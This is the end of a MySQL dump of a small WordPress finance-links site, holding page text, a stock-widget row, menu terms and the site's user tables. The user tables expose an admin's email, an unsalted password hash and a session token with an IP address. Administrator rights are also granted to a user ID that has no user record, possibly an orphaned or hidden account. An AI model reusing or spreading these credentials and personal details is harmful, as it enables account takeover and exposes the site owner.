target=\"_blank\" rel=\"noopener\">Yahoo Finance</a>: This site has up to date financial news, in addition to portfolio managements resources, international market date, message boards and more.\r\n\r\n ','Finance Links','','inherit','closed','closed','','125-revision-v1','','','2017-10-14 07:54:15','2017-10-14 07:54:15','',125,'http://santandershareholder.co.uk/125-revision-v1',0,'revision','',0),(132,1,'2017-10-14 07:56:47','2017-10-14 07:56:47','<h2>Financial Institutions, publications and websites of note</h2>\r\n \r\n<ul>\r\n <li><a href=\"http://fortune.com/\" target=\"_blank\" >Fortune Magazine</a>: A magazine focused on Fortune 500 companies and breaking business news.</li>\r\n <li><a href=\"http://hbr.org/\" target=\"_blank\" >Harvard Business Review</a></li>\r\n <li><a href=\"http://www.huffingtonpost.com/\" target=\"_blank\" >Huffington Post</a> UK and US finance news</li>\r\n <li><a href=\"http://www.gfma.org/\" target=\"_blank\" >Global Financial Markets Association</a>: An association representing the world\'s leading financial and capital market participants.</li>\r\n <li><a href=\"http://www.icba.org/\" target=\"_blank\" >The Independent Community Bankers of America</a>: A resource site for independent bankers.</li>\r\n <li><a href=\"http://www.naifa.org/\" target=\"_blank\" >National Association of Insurance and Financial Advisors</a>: An association representing the interests of insurance and financial advisors in the US</li>\r\n <li><a href=\"http://www.sifma.org/about/\" target=\"_blank\" >Securities Industry and Financial Markets Association</a>: An association that brings together the shared interests security firms, banks and asset managers.</li>\r\n <li><a href=\"http://www.kiplinger.com/\" target=\"_blank\" >Kiplinger</a>: US magazine offering personal financial news, investing admire and business forecasts.</li>\r\n <li><a href=\"http://www.nytimes.com/pages/business/\" target=\"_blank\" >The New York Times</a>: Breaking headlines + financial news from Wall Street.</li>\r\n <li><a href=\"http://time.com/\" target=\"_blank\" >Time</a>: More in-depth political, economic and news worthy stories.</li>\r\n <li><a href=\"http://online.wsj.com/home-page\" target=\"_blank\" >Wall Street Journal</a>: Newspaper focusing on domestic and international news with a business-focus.</li>\r\n <li><a href=\"https://www.hunterfinance.co.uk/apply-for-loan\" target=\"blank"\">Hunter Finance</a> UK finance house offering property loans</li>\r\n <li><a href=\"https://www.fca.org.uk/\" target=\"_blank\" >FCA | </a>Financial Conduct Authority</li>\r\n <li><a href=\"http://www.bankofengland.co.uk/Pages/home.aspx\" target=\"_blank\" >Bank of England</a></li>\r\n</ul>\r\n \r\n\r\n<strong>Other Finance websites</strong>\r\n<ul>\r\n <li><a href=\"http://www.waterfall-leasing.co.uk/\" target=\"blank"\">Waterfall leasing</a></li>\r\n <li><a href=\"http://www.mytermlifeinsurance.co.uk/\" target=\"blank"\">My term lifeinsurance</a></li>\r\n <li><a href=\"http://www.kings-college-brokers.co.uk/\" target=\"blank"\">Kings college brokers</a></li>\r\n <li><a href=\"http://www.firstchoiceloan.co.uk/\" target=\"blank"\">First choice UK loans</a></li>\r\n <li><a href=\"http://www.legal-medical.co.uk/\" target=\"blank"\">legal medical</a></li>\r\n <li><a href=\"http://www.rapc.co.uk/\" target=\"blank"\">rapc</a></li>\r\n <li><a href=\"http://www.humdrumming.co.uk/\" target=\"blank"\">Hum drumming</a></li>\r\n <li><a href=\"http://www.endowment-policy.co.uk/\" target=\"blank"\">Leading LLD Endowment policy</a></li>\r\n <li><a href=\"http://www.simply-accounting.co.uk/\" target=\"blank"\">TEC Simply accounting</a></li>\r\n <li><a href=\"http://www.fisa.co.uk/\" target=\"blank"\">FISA </a></li>\r\n <li><a href=\"http://www.slconsultancy.co.uk/\" target=\"blank"\">SLC (UK) Consultancy </a></li>\r\n <li><a href=\"http://www.wokingham-cab.org.uk/\" target=\"blank"\">Wokingham cab</a></li>\r\n <li><a href=\"http://www.delanceyandco.co.uk/\" target=\"blank"\">Delancey & co</a></li>\r\n</ul>\r\n<strong>List of All UK Building Societies</strong>\r\n\r\nBath Investment & Building Society\r\nBeverley Building Society\r\nBuckinghamshire Building Society\r\n\r\nCambridge Building Society\r\nChorley and District Building Society, The\r\nCoventry Building Society\r\nCumberland Building Society\r\n\r\nDarlington Building Society\r\nDudley Building Society\r\nDunfermline Building Society (In Administration)\r\n\r\nEarl Shilton Building Society\r\nEcology Building Society\r\n\r\nFurness Building Society\r\n\r\nHanley Economic Building Society\r\nHarpenden Building Society\r\nHinckley and Rugby Building Society\r\nHolmesdale Building Society\r\n\r\nIpswich Building Society\r\n\r\nLeeds Building Society\r\nLeek United Building Society\r\nLoughborough Building Society\r\nManchester Building Society\r\nMansfield Building Society, The\r\nMarket Harborough Building Society\r\nMarsden Building Society\r\nMelton Mowbray Building Society\r\nMonmouthshire Building Society\r\n\r\nNational Counties Building Society\r\nNationwide Building Society\r\nNewbury Building Society\r\nNewcastle Building Society\r\nNottingham Building Society\r\n\r\nPenrith Building Society\r\nPrincipality Building Society\r\nProgressive Building Society\r\n\r\nSaffron Building Society\r\nScottish Building Society\r\nSkipton Building Society\r\nStafford Railway Building Society, The\r\nSwansea Building Society\r\n\r\nTeachers\' Building Society\r\nTipton and Coseley Building Society\r\n\r\nVernon Building Society\r\n\r\nWest Bromwich Building Society\r\n\r\nYorkshire Building Society\r\n\r\nOther Financial links of interest\r\n\r\n \r\n\r\n<a href=\"http://www.accountingweb.com/\" target=\"_blank\" >Accounting Web</a>: A site that provides accounting news, information, tips, tools and resources for financial professionals.\r\n\r\n<a href=\"http://www.annualreports.com/\" target=\"_blank\" >Annual Reports</a>: This site allows users to view financial reports from companies.\r\n\r\n<a href=\"http://www.banktech.com/\" target=\"_blank\" >Bank Systems and Technology</a>: A sitefor the banking informational technology community.\r\n\r\n<a href=\"http://www.bankersalmanac.com/addcon/home/resources.aspx\" target=\"_blank\" >Bankers Almanac</a>: This site provides links to websites of international banks and other financial institutions.\r\n\r\n<a href=\"http://www.bankersonline.com/\" target=\"_blank\" >Bankers Online</a>: A site for bankers and financial experts providing information on marketing, technology and e-banking.\r\n\r\n<a href=\"http://www.bizjournals.com/bizwomen\" target=\"_blank\" >BizWomen</a>: A site for women business professionals.\r\n\r\n<a href=\"http://www.charteredbanker.com/\" target=\"_blank\" >Chartered Banker Institute</a>: Find useful information and insights and resources into finance and banking.\r\n\r\n<a href=\"http://www.dailyfinance.com/\" target=\"_blank\" >Daily Finance</a>: A site offering articles and information from leading business and financial experts.\r\n\r\n<a href=\"http://www.dividendinvestor.com/\" target=\"_blank\" >Dividend Investor</a>: A site specializing in stock data analysis and provisions.\r\n\r\n<a href=\"http://equityfeed.com/\" target=\"_blank\" >Equity Feed</a>: A site specifically targeting active traders and day traders.\r\n\r\n<a href=\"http://www.frbsf.org/\" target=\"_blank\" >Federal Reserve Bank of San Francisco</a>: The site for the Federal Reserve Bank of San Francisco.\r\n\r\n \r\n\r\n<a href=\"http://www.franchising.com/\" target=\"_blank\" >Franchise Update Media</a>: A site connecting franchise industry decision makers with information and resources.\r\n\r\n<a href=\"http://www.ibankingfaq.com/\" target=\"_blank\" >IBanking FAQ</a>: A sitewith investment banking resources and information.\r\n\r\n<a href=\"http://independentbanker.org/\" target=\"_blank\" >Independent Banker</a>: A site for community banking news, trends and insights.\r\n\r\n<a href=\"http://www.informationweek.com/\" target=\"_blank\" >Information Week</a>: A site for the business technology professionals.\r\n\r\n<a href=\"http://ino.com/\" target=\"_blank\" >INO.com</a>: A site specializing in the futures and options markets, with continuous quotes, charts and news.\r\n\r\n<a href=\"http://www.ici.org/\" target=\"_blank\" >Investment Company Institute</a>: The sitefor the company working to advance the interests of mutual funds, their shareholders, directors and investment advisers.\r\n\r\n<a href=\"http://www.investopedia.com/\" target=\"_blank\" >
Investopedia</a>: A site for beginners in the banking and financial industry that includes a stock simulator.\r\n\r\n<a href=\"http://www.investors.com/default.htm\" target=\"_blank\" >Investor\'s Business Daily</a>: A site for stock investment research and education, in addition to business and financial news.\r\n\r\n<a href=\"https://www.jpmorgan.com/pages/jpmorgan\" target=\"_blank\" >JP Morgan</a>: The site for the JP Morgan financial company.\r\n\r\n<a href=\"http://www.kauffman.org/what-we-do/research\" target=\"_blank\" >The Kauffman Foundation</a>: A research site helping businesses understand what drives innovation and economic growth.\r\n\r\n<a href=\"http://www.londonstockexchange.com/home/homepage.htm\" target=\"_blank\" >London Stock Exchange</a>: The official sitewith stock prices and international markets for the London Stock Exchange.\r\n\r\n<a href=\"http://www.fool.com/?source=iflsittph0000001\" target=\"_blank\" >The Motley Fool</a>: A site with current stock prices and investing advice.\r\n\r\n<a href=\"http://www.nasdaq.com/\" target=\"_blank\" >Nasdaq</a>: The site for Nasdaq, which gives continuous updates throughout the day.\r\n\r\n<a href=\"https://www.nyse.com/index\" target=\"_blank\" >New York Stock Exchange</a>: The site for the NYSE with information for investors and other financial professionals.\r\n\r\n<a href=\"https://www.probanx.com/\" target=\"_blank\" >Probanx</a>: A site for eBanking software.\r\n\r\n<a href=\"http://www.sec.gov/\" target=\"_blank\" >Securities and Exchange Commission</a>: As part of the Federal Government, the SEC protects investors and maintains market integrity among many other jobs in the finance industry.\r\n\r\n<a class=\"broken_link\" href=\"http://www.seisfund.com/home.html\" target=\"_blank\" >SEIS Fund</a>: A start-up funding sitefor businesses.\r\n\r\n<a href=\"https://www.scottrade.com/online-trading/trading-website.html\" target=\"_blank\" >Scottrade</a>: The sitefor the Scottrade financial company.\r\n\r\n<a href=\"http://www.shibuimarkets.com/\" target=\"_blank\" >Shibui Markets</a>: A global financial portal that helps users understand financial information including foreign currency exchanges, emerging market bonds and international equities.\r\n\r\n<a href=\"http://www.standardandpoors.com/en_US/web/guest/home\" target=\"_blank\" >Standard and Poor\'s</a>: The site for the world\'s leading contributor of independent credit ratings, risk evaluation and investment research.\r\n\r\n<a href=\"http://www.startupnation.com/\" target=\"_blank\" >Startup Nation</a>: A site to help businesses grow and plan for their future.\r\n\r\n<a href=\"http://www.thestreet.com/\" target=\"_blank\" >The Street</a>: A site giving financial news and information along with the stock market updates.\r\n\r\n<a href=\"http://stockcharts.com/\" target=\"_blank\" >Stock Charts</a>: A site offering tools to create attractive financial charts.\r\n\r\n<a href=\"http://www.stockmarketgame.org/\" target=\"_blank\" >The Stock Market Game</a>: A site with real time stock information and news on the stock markets.\r\n\r\n<a href=\"http://www.stocktrak.com/\" target=\"_blank\" >Stock Trak</a>: A site for stock market game simulations.\r\n\r\n<a href=\"https://www.tdameritrade.com/home.page\" target=\"_blank\" >TD Ameritrade</a>: The sitefor the financial trading company.\r\n\r\n<a href=\"http://www.ted.com/\" target=\"_blank\" >TED</a>: A multitude of videos from the country\'s most sought after business innovators and financial experts.\r\n\r\n<a href=\"http://www.updown.com/\" target=\"_blank\" >UpDown</a>: A real-time trading simulation to help investors of all levels to improve their skills.\r\n\r\n<a href=\"https://personal.vanguard.com/us/funds/snapshot?FundId=0970&FundIntExt=INT\" target=\"_blank\" >Vanguard</a>: The sitefor the financial planning company.\r\n<h3>Business Associations and Organizations</h3>\r\n<a href=\"http://www.aba.com/Pages/default.aspx\" target=\"_blank\" >American Bankers Association</a>: Financial and regulatory information for bankers and financial professionals and consumers.\r\n\r\n<a href=\"http://www.afajof.org/view/index.html\" target=\"_blank\" >American Financial Association</a>: An organization devoted to the study and promotion and knowledge of financial economics.\r\n\r\n<a href=\"http://www.imanet.org/ima_home.aspx\" target=\"_blank\" >Association of Accountants and Financial Professionals in Business</a>: An organization to promote knowledge and professionalism among cost accountants and financial executives.\r\n\r\n<a href=\"http://www.afponline.org/\" target=\"_blank\" >Association for Financial Professionals</a>: A professional society that represents finance executives globally.\r\n\r\n<a href=\"http://www.bis.org/about/index.htm\" target=\"_blank\" >Bank for International Settlements</a>: The world\'s oldest international financial organization.\r\n\r\n<a href=\"https://www.cfa.com/eweb/\" target=\"_blank\" >Commercial Finance Associations</a>: The international trade association dedicated to the asset-based lending and factoring industries.\r\n\r\n<a href=\"http://www.efa-online.org/r/default.asp?iId=ILGLJ\" target=\"_blank\" >European Finance Association</a>: A professional society of academics and practitioners with an interest in financial management, theory and application.\r\n\r\n<a href=\"http://www.financialexecutives.org/KenticoCMS/home.aspx#axzz3HgZcmiN7\" target=\"_blank\" >Financial Executives International</a>: A site senior-level financial executives.\r\n\r\n<a href=\"http://fwa.org/\" target=\"_blank\" >Financial Women\'s Association</a>: An association for high-achieving financial professionals.\r\n\r\n \r\n\r\n<a href=\"http://www.financialpro.org/\" target=\"_blank\" >Society of Financial Service Professionals</a>: Society of financial professionals helping consumers with financial planning.\r\n<h3>News Agencies and Financial News</h3>\r\n<a href=\"http://www.americanbanker.com/\" target=\"_blank\" >American Banker</a>: A sitedevoted to news from the US banking and finance industries.\r\n\r\n<a href=\"http://www.bloomberg.com/\" target=\"_blank\" >Bloomberg News</a>: 24-hour news coverage on economies, markets, commerce, industries and governments.\r\n\r\n<a href=\"http://www.cnbc.com/\" target=\"_blank\" >CNBC</a>: The business centered portion of NBC with 24-hour business news.\r\n\r\n<a href=\"http://www.cnn.com/\" target=\"_blank\" >CNN</a>: The 24-hour news channel\'s sitethat is constantly updated with breaking stories from around the world, including both financial, political and economic news.\r\n\r\n<a href=\"http://money.cnn.com/\" target=\"_blank\" >CNN Money</a>: This site is devoted to financial and economic news from around the world.\r\n\r\n<a href=\"http://dealbreaker.com/\" target=\"_blank\" >Dealbreaker</a>: A sitewith financial news, commentary and analysis about Wall Street.\r\n\r\n<a href=\"http://www.efinancialnews.com/\" target=\"_blank\" >eFinancial News</a>: A securities and investment banking weekly news source.\r\n\r\n<a href=\"http://www.ft.com/home/us\" target=\"_blank\" >Financial Times</a>: This site, based in the UK, provides international business, finance, economic and political news and commentary.\r\n\r\n<a href=\"http://www.foxbusiness.com/index.html\" target=\"_blank\" >Fox Business News</a>: Website for the 24-news channel, focused on business news.\r\n\r\n<a href=\"https://www.google.com/finance\" target=\"_blank\" >Google Finance</a>: This site provides real-time stock quotes and charts, financial news, currency conversion and portfolio tracking.\r\n\r\n<a href=\"http://www.ibtimes.com/\" target=\"_blank\" >International Business Times</a>: This site provides international business news, financial news, market news and political commentary that many CEOs need to keep up to date on the ever-changing world around them.\r\n\r\n<a href=\"http://www.marketplace.org/\" target=\"_blank\" >Marketplace</a>: A site from American Public Media centered on the economy, personal finance, Wall Street and World News.\r\n\r\n<a href=\"http://www.marketwatch.com/\" target=\"_blank\" >Market Watch</a>: The financial siteis a subsidiary of the Wall Street Journal. This site has up-to-date financial information and stock market numbers.\r\n\r\n<a href=\"http://www.msn.com/en-us/money\" target=\"_blank\" >MSN Money</a>: The financial siteof NBC News. This site provides information on personal finance and the stock markets.\r\n\r\n<a href=\"http://www.npr.org/\" target=\"_blank\" >NPR</a>: Local, domestic and international news presented in various news programs and blogs.\r\n\r\n<a href=\"http://dealbook.nytimes.com/\" target=\"_blank\" >NYT Dealbook</a>: A blog with business news and opinion columns on Wall Street.\r\n\r\n<a href=\"http://qz.com/\" target=\"_blank\" >Quartz</a>: A relatively new news agency, focused on the global economy. News is designed to be read on tablets and smart phones.\r\n\r\n<a href=\"http://www.reuters.com/finance\" target=\"_blank\" >Reuters Finance</a>: The top news organization\'s site for financial news.\r\n\r\n<a href=\"http://finance.yahoo.com/\" target=\"_blank\" >Yahoo Finance</a>: This site has up to date financial news, in addition to portfolio managements resources, international market date, message boards and more.\r\n\r\n ','Finance Links','','inherit','closed','closed','','125-revision-v1','','','2017-10-14 07:56:47','2017-10-14 07:56:47','',125,'http://santandershareholder.co.uk/125-revision-v1',0,'revision','',0);
/*!40000 ALTER TABLE `wp_posts` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_stock_widgets`
--
DROP TABLE IF EXISTS `wp_stock_widgets`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_stock_widgets` (
`id` mediumint(9) NOT NULL AUTO_INCREMENT,
`name` varchar(50) NOT NULL DEFAULT '',
`bg_color1` varchar(7) NOT NULL DEFAULT '#000000',
`bg_color2` varchar(7) NOT NULL DEFAULT '#7F7F7F',
`font_color` varchar(7) NOT NULL DEFAULT '#5DFC0A',
`font_family` varchar(20) NOT NULL DEFAULT 'Times',
`display_order` varchar(20) NOT NULL DEFAULT 'Preset',
`change_style` varchar(20) NOT NULL DEFAULT 'Box',
`font_size` tinyint(3) NOT NULL DEFAULT 12,
`width` smallint(4) NOT NULL DEFAULT 300,
`height` smallint(4) NOT NULL DEFAULT 70,
`data_display` tinyint(2) NOT NULL DEFAULT 30,
`display_number` tinyint(3) NOT NULL DEFAULT 5,
`draw_vertical_lines` tinyint(1) NOT NULL DEFAULT 0,
`draw_horizontal_lines` tinyint(1) NOT NULL DEFAULT 0,
`show_header` tinyint(1) NOT NULL DEFAULT 0,
`stock_page_url` text NOT NULL,
`stock_list` text NOT NULL,
`advanced_style` text NOT NULL,
PRIMARY KEY (`id`),
UNIQUE KEY `name` (`name`)
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_stock_widgets`
--
LOCK TABLES `wp_stock_widgets` WRITE;
/*!40000 ALTER TABLE `wp_stock_widgets` DISABLE KEYS */;
INSERT INTO `wp_stock_widgets` VALUES (1,'Default Settings','#000000','#7F7F7F','#5DFC0A','Times','Preset','Box',12,300,70,30,5,0,0,0,'https://www.google.com/finance?q=__STOCK__','GOOG,YHOO,AAPL','margin: auto;');
/*!40000 ALTER TABLE `wp_stock_widgets` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_relationships`
--
DROP TABLE IF EXISTS `wp_term_relationships`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_relationships` (
`object_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`term_taxonomy_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`term_order` int(11) NOT NULL DEFAULT 0,
PRIMARY KEY (`object_id`,`term_taxonomy_id`),
KEY `term_taxonomy_id` (`term_taxonomy_id`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_relationships`
--
LOCK TABLES `wp_term_relationships` WRITE;
/*!40000 ALTER TABLE `wp_term_relationships` DISABLE KEYS */;
INSERT INTO `wp_term_relationships` VALUES (37,2,0),(38,2,0),(39,2,0),(40,2,0),(41,2,0),(42,2,0),(43,2,0),(44,2,0),(112,3,0),(113,3,0),(114,3,0),(115,3,0),(116,3,0),(117,3,0),(118,3,0),(122,4,0),(123,4,0),(124,4,0),(127,3,0);
/*!40000 ALTER TABLE `wp_term_relationships` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_term_taxonomy`
--
DROP TABLE IF EXISTS `wp_term_taxonomy`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_term_taxonomy` (
`term_taxonomy_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`taxonomy` varchar(32) NOT NULL DEFAULT '',
`description` longtext NOT NULL,
`parent` bigint(20) unsigned NOT NULL DEFAULT 0,
`count` bigint(20) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_taxonomy_id`),
UNIQUE KEY `term_id_taxonomy` (`term_id`,`taxonomy`),
KEY `taxonomy` (`taxonomy`)
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_term_taxonomy`
--
LOCK TABLES `wp_term_taxonomy` WRITE;
/*!40000 ALTER TABLE `wp_term_taxonomy` DISABLE KEYS */;
INSERT INTO `wp_term_taxonomy` VALUES (1,1,'category','',0,0),(2,2,'nav_menu','',0,8),(3,3,'nav_menu','',0,8),(4,4,'nav_menu','',0,3);
/*!40000 ALTER TABLE `wp_term_taxonomy` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_termmeta`
--
DROP TABLE IF EXISTS `wp_termmeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_termmeta` (
`meta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`term_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`meta_id`),
KEY `term_id` (`term_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_termmeta`
--
LOCK TABLES `wp_termmeta` WRITE;
/*!40000 ALTER TABLE `wp_termmeta` DISABLE KEYS */;
/*!40000 ALTER TABLE `wp_termmeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_terms`
--
DROP TABLE IF EXISTS `wp_terms`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_terms` (
`term_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`name` varchar(200) NOT NULL DEFAULT '',
`slug` varchar(200) NOT NULL DEFAULT '',
`term_group` bigint(10) NOT NULL DEFAULT 0,
PRIMARY KEY (`term_id`),
KEY `slug` (`slug`(191)),
KEY `name` (`name`(191))
) ENGINE=InnoDB AUTO_INCREMENT=5 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_terms`
--
LOCK TABLES `wp_terms` WRITE;
/*!40000 ALTER TABLE `wp_terms` DISABLE KEYS */;
INSERT INTO `wp_terms` VALUES (1,'Uncategorized','uncategorized',0),(2,'santander','santander',0),(3,'top','top',0),(4,'primary','primary',0);
/*!40000 ALTER TABLE `wp_terms` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_usermeta`
--
DROP TABLE IF EXISTS `wp_usermeta`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_usermeta` (
`umeta_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_id` bigint(20) unsigned NOT NULL DEFAULT 0,
`meta_key` varchar(255) DEFAULT NULL,
`meta_value` longtext DEFAULT NULL,
PRIMARY KEY (`umeta_id`),
KEY `user_id` (`user_id`),
KEY `meta_key` (`meta_key`(191))
) ENGINE=InnoDB AUTO_INCREMENT=27 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_usermeta`
--
LOCK TABLES `wp_usermeta` WRITE;
/*!40000 ALTER TABLE `wp_usermeta` DISABLE KEYS */;
INSERT INTO `wp_usermeta` VALUES (1,1,'nickname','santandershareholder'),(2,1,'first_name',''),(3,1,'last_name',''),(4,1,'description',''),(5,1,'rich_editing','true'),(6,1,'comment_shortcuts','false'),(7,1,'admin_color','fresh'),(8,1,'use_ssl','0'),(9,1,'show_admin_bar_front','true'),(10,1,'locale',''),(11,1,'wp_capabilities','a:1:{s:13:\"administrator\";b:1;}'),(12,1,'wp_user_level','10'),(13,1,'dismissed_wp_pointers','vc_pointers_backend_editor'),(14,1,'show_welcome_panel','1'),(15,1,'session_tokens','a:1:{s:64:\"e8e99464f254d9b723038342ef73cab435f9d95b30c4e75d9270b02480483c79\";a:4:{s:10:\"expiration\";i:1616897961;s:2:\"ip\";s:11:\"37.188.32.3\";s:2:\"ua\";s:114:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36\";s:5:\"login\";i:1616725161;}}'),(16,1,'wp_dashboard_quick_press_last_post_id','136'),(17,1,'community-events-location','a:1:{s:2:\"ip\";s:11:\"37.188.32.0\";}'),(18,1,'closedpostboxes_page','a:0:{}'),(19,1,'metaboxhidden_page','a:4:{i:0;s:10:\"postcustom\";i:1;s:16:\"commentstatusdiv\";i:2;s:7:\"slugdiv\";i:3;s:9:\"authordiv\";}'),(20,1,'managenav-menuscolumnshidden','a:5:{i:0;s:11:\"link-target\";i:1;s:11:\"css-classes\";i:2;s:3:\"xfn\";i:3;s:11:\"description\";i:4;s:15:\"title-attribute\";}'),(21,1,'metaboxhidden_nav-menus','a:2:{i:0;s:12:\"add-post_tag\";i:1;s:15:\"add-post_format\";}'),(22,1,'nav_menu_recently_edited','4'),(23,1,'wp_user-settings','libraryContent=browse&editor=html'),(24,1,'wp_user-settings-time','1507967803'),(25,2,'wp_capabilities','a:1:{s:13:\"administrator\";s:1:\"1\";}'),(26,2,'wp_user_level','10');
/*!40000 ALTER TABLE `wp_usermeta` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `wp_users`
--
DROP TABLE IF EXISTS `wp_users`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wp_users` (
`ID` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
`user_login` varchar(60) NOT NULL DEFAULT '',
`user_pass` varchar(255) NOT NULL DEFAULT '',
`user_nicename` varchar(50) NOT NULL DEFAULT '',
`user_email` varchar(100) NOT NULL DEFAULT '',
`user_url` varchar(100) NOT NULL DEFAULT '',
`user_registered` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`user_activation_key` varchar(255) NOT NULL DEFAULT '',
`user_status` int(11) NOT NULL DEFAULT 0,
`display_name` varchar(250) NOT NULL DEFAULT '',
PRIMARY KEY (`ID`),
KEY `user_login_key` (`user_login`),
KEY `user_nicename` (`user_nicename`),
KEY `user_email` (`user_email`)
) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `wp_users`
--
LOCK TABLES `wp_users` WRITE;
/*!40000 ALTER TABLE `wp_users` DISABLE KEYS */;
INSERT INTO `wp_users` VALUES (1,'admin','7c969755600b4ac5f713103a40236ee5','santandershareholder','amber.platts@vanillacircus.co.uk','','2017-09-25 16:00:27','',0,'santandershareholder');
/*!40000 ALTER TABLE `wp_users` ENABLE KEYS */;
UNLOCK TABLES;
/*!40103 SET TIME_ZONE=@OLD_TIME_ZONE */;
/*!40101 SET SQL_MODE=@OLD_SQL_MODE */;
/*!40014 SET FOREIGN_KEY_CHECKS=@OLD_FOREIGN_KEY_CHECKS */;
/*!40014 SET UNIQUE_CHECKS=@OLD_UNIQUE_CHECKS */;
/*!40101 SET CHARACTER_SET_CLIENT=@OLD_CHARACTER_SET_CLIENT */;
/*!40101 SET CHARACTER_SET_RESULTS=@OLD_CHARACTER_SET_RESULTS */;
/*!40101 SET COLLATION_CONNECTION=@OLD_COLLATION_CONNECTION */;
/*!40111 SET SQL_NOTES=@OLD_SQL_NOTES */;
-- Dump completed on 2023-02-01 0:12:49